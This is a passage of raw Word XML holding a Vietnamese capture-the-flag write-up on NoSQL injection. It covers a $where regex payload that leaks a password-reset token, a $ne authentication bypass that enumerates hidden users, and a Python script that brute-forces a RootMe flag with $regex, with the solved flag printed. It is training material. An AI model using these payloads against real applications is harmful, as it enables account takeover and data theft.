        <w:t xml:space="preserve"> dò tìm với 2 tham số 0 và a, tham số đầu từ 0-20 và tham số thứ 2 từ a-z, A-Z, 0-9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A46AF7" w14:textId="6B94FB76" w:rsidR="002356EC" w:rsidRPr="00EA4348" w:rsidRDefault="002356EC" w:rsidP="00716DD7">
      <w:r w:rsidRPr="00EA4348">
        <w:t>Khi dò cột thứ 1 ta nhận</w:t>
      </w:r>
      <w:r w:rsidR="00EA4348">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t xml:space="preserve"> username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484A196E" w14:textId="40D62947" w:rsidR="002356EC" w:rsidRPr="00EA4348" w:rsidRDefault="002356EC" w:rsidP="00716DD7">
      <w:r w:rsidRPr="00EA4348">
        <w:t>Cột thứ 2: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA3A725" w14:textId="067F20B1" w:rsidR="002356EC" w:rsidRPr="00EA4348" w:rsidRDefault="002356EC" w:rsidP="00716DD7">
      <w:r w:rsidRPr="00EA4348">
        <w:t>Cột thứ 3: email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4DC49B" w14:textId="089F8BE0" w:rsidR="002356EC" w:rsidRPr="00EA4348" w:rsidRDefault="002356EC" w:rsidP="00716DD7">
      <w:r w:rsidRPr="00EA4348">
        <w:t xml:space="preserve">Cột thứ 4: </w:t>
      </w:r>
      <w:r w:rsidR="00557638" w:rsidRPr="00EA4348">
        <w:t>changePwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE66BAA" w14:textId="23B253DD" w:rsidR="00557638" w:rsidRDefault="00557638" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="133736DB" wp14:editId="484030BF">
            <wp:extent cx="5943600" cy="1861185"/>
            <wp:effectExtent l="0" t="0" r="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861185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398357CF" w14:textId="77777777" w:rsidR="00EA4348" w:rsidRDefault="00EA4348" w:rsidP="00716DD7"/>
    <w:p w14:paraId="661E9FFB" w14:textId="4D7FC3B2" w:rsidR="00557638" w:rsidRPr="00EA4348" w:rsidRDefault="00557638" w:rsidP="00716DD7">
      <w:r w:rsidRPr="00EA4348">
        <w:lastRenderedPageBreak/>
        <w:t>Tiếp theo ta có thể trích xuất giá trị của changePwd để có thể thay đổi pass của carlos và tiến hành đăng nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6816591D" w14:textId="686C110A" w:rsidR="00557638" w:rsidRDefault="00557638" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4348">
        <w:t xml:space="preserve">Dùng payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4348">
        <w:t>"$where</w:t>
      </w:r>
      <w:r w:rsidRPr="00557638">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>":"this.changePwd.match('^.{0}a.*')"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> chuyển sang intruder và tiến hành dò các giá trị trong trường changePwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A77E201" w14:textId="265C398D" w:rsidR="00557638" w:rsidRDefault="00557638" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00557638">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B18ACB1" wp14:editId="2E0CA028">
            <wp:extent cx="5943600" cy="23463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346325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F372DC" w14:textId="34C95CCB" w:rsidR="00557638" w:rsidRDefault="00557638" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ta nhận đ</w:t>
      </w:r>
      <w:r w:rsidR="00774EB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ược giá trị: 274b4cd83735a824</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5830A643" w14:textId="316D2BE9" w:rsidR="00557638" w:rsidRPr="00EA4348" w:rsidRDefault="00774EB7" w:rsidP="00716DD7">
      <w:r w:rsidRPr="00EA4348">
        <w:t>Tiến hành bắt request forgot password và thêm tham số trên url, lúc này ta nhận được trang reset pass, ta tiến hành reset pass và đăng nhập vào account carlos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30247B" w14:textId="7B364BB0" w:rsidR="00774EB7" w:rsidRDefault="00774EB7" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774EB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D02A49B" wp14:editId="1971D050">
            <wp:extent cx="4701947" cy="1996613"/>
            <wp:effectExtent l="0" t="0" r="381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701947" cy="1996613"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0035FA" w14:textId="2CAE65C5" w:rsidR="00774EB7" w:rsidRDefault="00774EB7" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774EB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73826F4B" wp14:editId="369EB774">
            <wp:extent cx="5943600" cy="2585720"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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585720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lab thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19094B3B" w14:textId="3B1B9CB9" w:rsidR="00774EB7" w:rsidRDefault="00774EB7" w:rsidP="00716DD7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D582D37" wp14:editId="2D13A55F">
            <wp:extent cx="2743200" cy="200264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753139" cy="2009896"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="429AC91D" w14:textId="111A5D3F" w:rsidR="00E42CB0" w:rsidRPr="00774EB7" w:rsidRDefault="00774EB7" w:rsidP="002A2EA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774EB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B780531" wp14:editId="0A19C066">
            <wp:extent cx="4794735" cy="2994660"/>
            <wp:effectExtent l="0" t="0" r="635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806799" cy="3002195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="439C0B54" w14:textId="3611DE66" w:rsidR="00C31D6C" w:rsidRDefault="00657B40" w:rsidP="00C31D6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab 5</w:t>
      </w:r>
      <w:r w:rsidR="00774EB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C31D6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  RootMe - </w:t>
      </w:r>
      <w:r w:rsidR="00C31D6C" w:rsidRPr="00C31D6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL injection </w:t>
      </w:r>
      <w:r w:rsidR="00C31D6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00C31D6C" w:rsidRPr="00C31D6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D22FD9B" w14:textId="60D9DCAC" w:rsidR="00C31D6C" w:rsidRPr="00C31D6C" w:rsidRDefault="00C31D6C" w:rsidP="00C31D6C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục tiêu: tìm các user ẩn có trong hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181746DA" w14:textId="11000E01" w:rsidR="00062D26" w:rsidRPr="00EA4348" w:rsidRDefault="00C31D6C" w:rsidP="00C31D6C">
      <w:pPr>
        <w:ind w:left="-76"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA4348">
        <w:t>Tiến hành đăng nhập thử vào hệ thống và username và pass sai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60780679" w14:textId="00B0FA55" w:rsidR="00062D26" w:rsidRDefault="00C31D6C" w:rsidP="00062D26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C31D6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20802E80" wp14:editId="0758155D">
            <wp:extent cx="5943600" cy="154686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1546860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0C3E4" w14:textId="3E2B0DF6" w:rsidR="00C31D6C" w:rsidRPr="00EA4348" w:rsidRDefault="00C31D6C" w:rsidP="00062D26">
      <w:r w:rsidRPr="00EA4348">
        <w:t>Dùng toán tử $ne để tìm các username bất kì, thì ta tìm được có 1 account admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C86C8C0" w14:textId="77777777" w:rsidR="00062D26" w:rsidRDefault="00062D26" w:rsidP="00062D26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00062D26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EADFDC3" wp14:editId="193EE082">
            <wp:extent cx="5943600" cy="1273810"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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1273810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28051AD1" w14:textId="273B2968" w:rsidR="00C31D6C" w:rsidRPr="00EA4348" w:rsidRDefault="00C31D6C" w:rsidP="00062D26">
      <w:r w:rsidRPr="00EA4348">
        <w:t>Tiếp theo ta tìm account khác admin, thì ta được thêm 1 account là test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A0BA7" w14:textId="0AB8AC5A" w:rsidR="00657B40" w:rsidRPr="00062D26" w:rsidRDefault="00062D26" w:rsidP="00062D26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00062D26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69B8BA8E" wp14:editId="7182F956">
            <wp:extent cx="5943600" cy="128143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1281430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00774EB7" w:rsidRPr="00062D26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055341E5" w14:textId="7BC5AC42" w:rsidR="00062D26" w:rsidRPr="00EA4348" w:rsidRDefault="00C31D6C" w:rsidP="00062D26">
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Tiếp theo nữa ta tìm account mà khác cả admin và test, thì lúc này ta đã tìm được cờ và lab thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2160C272" w14:textId="2FD7F98D" w:rsidR="00062D26" w:rsidRPr="00062D26" w:rsidRDefault="00062D26" w:rsidP="00062D26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B8D5D68" wp14:editId="68FEBADE">
            <wp:extent cx="5943600" cy="137541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1375410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B52AF" w14:textId="2FA05FCD" w:rsidR="00657B40" w:rsidRDefault="00657B40" w:rsidP="00657B40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00657B40">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab 6</w:t>
      </w:r>
      <w:r w:rsidR="00774EB7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C31D6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> RootMe - </w:t>
      </w:r>
      <w:r w:rsidR="00C31D6C" w:rsidRPr="00C31D6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NoSQL injection </w:t>
      </w:r>
      <w:r w:rsidR="00C31D6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00C31D6C" w:rsidRPr="00C31D6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CD5ED2" w14:textId="4FAA5BA4" w:rsidR="00C31D6C" w:rsidRDefault="00C31D6C" w:rsidP="00C31D6C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục tiêu: tìm flag được giấu trong hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41249CF6" w14:textId="45F4C1BD" w:rsidR="00BE2FE9" w:rsidRPr="00EA4348" w:rsidRDefault="00BE2FE9" w:rsidP="00C31D6C">
      <w:r w:rsidRPr="00EA4348">
        <w:t>Tiến hành dò tìm thử thì ta nhận được invalid flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCB7271" w14:textId="18F6BA5C" w:rsidR="00C31D6C" w:rsidRDefault="00BE2FE9" w:rsidP="00C31D6C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="452CF7BD" wp14:editId="6928D6B7">
            <wp:extent cx="3761905" cy="2066667"/>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761905" cy="2066667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD1E6DA" w14:textId="415F9284" w:rsidR="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00C31D6C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4348">
        <w:t>Tiến hành dùng toán tử $ne ở flag dể dò xem thì ta nhận được response Yeah…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B9F54E5" wp14:editId="5E9BE951">
            <wp:extent cx="5943600" cy="236791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367915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA51EEA" w14:textId="2519AA92" w:rsidR="00BE2FE9" w:rsidRPr="00EA4348" w:rsidRDefault="00BE2FE9" w:rsidP="00C31D6C">
      <w:r w:rsidRPr="00EA4348">
        <w:t>Từ đó ta tiến hành code dùng script để dò xem flag là gì, dò từng kí tự, dùng toàn tử $regex, ký tự nào đúng thì ta sẽ được được response Yeah… tương tự như trên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F5C0E" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B801E" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>import urllib3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EE27B" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>import string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01134B86" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>import urllib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F52D9A7" w14:textId="04F6447E" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>urllib3.disable_warnings()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874B570" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2FA00E" w14:textId="76AE3DB5" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>u='http://challenge01.root-me.org/web-serveur/ch48/index.php'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1C06F0" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174302DA" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">  for c in string.printable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D11AA0" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    if c not in ['*','+','.','?','|', '#', '&amp;', '$']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F70CCB" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">      payload=f"?chall_name=nosqlblind&amp;flag[$regex]=^{flag + c}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B2A914" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">      r = requests.get(u + payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D47D8" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">      if 'Yeah' in r.text:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A12AC" w14:textId="77777777" w:rsidR="00BE2FE9" w:rsidRPr="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        print(f"Found one more char : {flag+c}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491EF1E2" w14:textId="3CFB04DC" w:rsidR="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        flag += c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C8D9A" w14:textId="6D78FAD1" w:rsidR="00BE2FE9" w:rsidRDefault="00BE2FE9" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi chạy scipt xong thì ta nhận được flag là: </w:t>
      </w:r>
      <w:r w:rsidR="00EA4348">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#@sY_n0_5q7_1nj3c710n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0727BFE4" w14:textId="01D013E8" w:rsidR="00EA4348" w:rsidRPr="00C31D6C" w:rsidRDefault="00EA4348" w:rsidP="00BE2FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4348">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="269856AB" wp14:editId="3D41981E">
            <wp:extent cx="5936494" cy="3802710"/>
            <wp:effectExtent l="0" t="0" r="7620"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36494" cy="3802710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
